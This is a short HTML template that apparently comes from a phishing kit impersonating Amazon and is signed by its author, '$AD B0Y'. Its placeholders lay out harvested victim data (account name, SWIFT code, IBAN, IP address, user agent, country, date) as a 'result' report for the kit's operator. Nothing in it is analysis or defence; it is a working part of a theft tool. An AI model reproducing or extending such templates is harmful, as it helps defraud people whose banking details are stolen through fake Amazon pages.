<fieldset style="border: 2px solid #0061ff;border-radius:10px;max-width: 60%;margin: 0 auto"><legend><b><font color="#0071ce">Enjoy</font><font color="#0071ce"> Powered By</font><font color="cyan"> $AD B0Y</font></b></legend>
    <pre>
    <font color="#0071ce">
    <b>================[Bank Info]================</b></font>
    <font color="black">
    Name on Account      : {name}
    Swift Code           : {swift_code}
    IBAN                 : {iban}
    </font>
    <font color="#0071ce">
    <b>================[IP Info]================</b>
    User Agent           : {useragent}  
    IP Address           : {ip}
    Country              : {country}
    Date                 : {date}
    </font>
    <font color="green">
    <b>================[ Amazon ]================</b>
    </font>
    </pre>
    </fieldset>